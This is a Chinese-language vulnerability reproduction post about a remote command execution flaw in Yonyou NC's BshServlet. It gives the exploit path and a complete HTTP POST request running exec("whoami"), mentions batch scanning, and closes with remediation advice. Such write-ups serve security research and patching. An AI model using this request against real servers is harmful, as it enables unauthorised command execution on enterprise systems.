壹、漏洞簡介
用友NC是壹款企業級管理軟件,在大中型企業廣泛使用。實現建模、開發、繼承、運行、管理壹體化的IT解決方案信息化平臺。
用友NC存在反序列化漏洞,攻擊者通過構造特定的HTTP請求,可以在目標服務器上遠程執行任意命令。(用友 NC bsh.servlet.BshServlet 存在遠程命令執行漏洞,通過BeanShell 執行遠程命令獲取服務器權限。)
二、漏洞影響
用友NC 全版本
三、漏洞復現
主頁樣式
漏洞url:
/servlet/~ic/bsh.servlet.BshServlet
訪問執行:
exec("whoami");
詳細數據包:
POST /servlet/~ic/bsh.servlet.BshServlet
host: 127.0.0.1:8080
user-agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
bsh.script=exec("whoami");
簡單批量壹下
四、修復建議
1、用友NC為商業軟件,可直接聯系用友官方獲得安全升級方案。
2、在官方安全補丁發布之前,建議相關企業嚴格限制用友NC的訪問權限,禁止外部IP請求用友NC應用。
參考:
/weixin_45728976/article/details/106560286
http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html?h=%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E
往期用友漏洞:
用友GRP-u8 註入-RCE漏洞復現
註意:?
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與妳並肩前行!!!!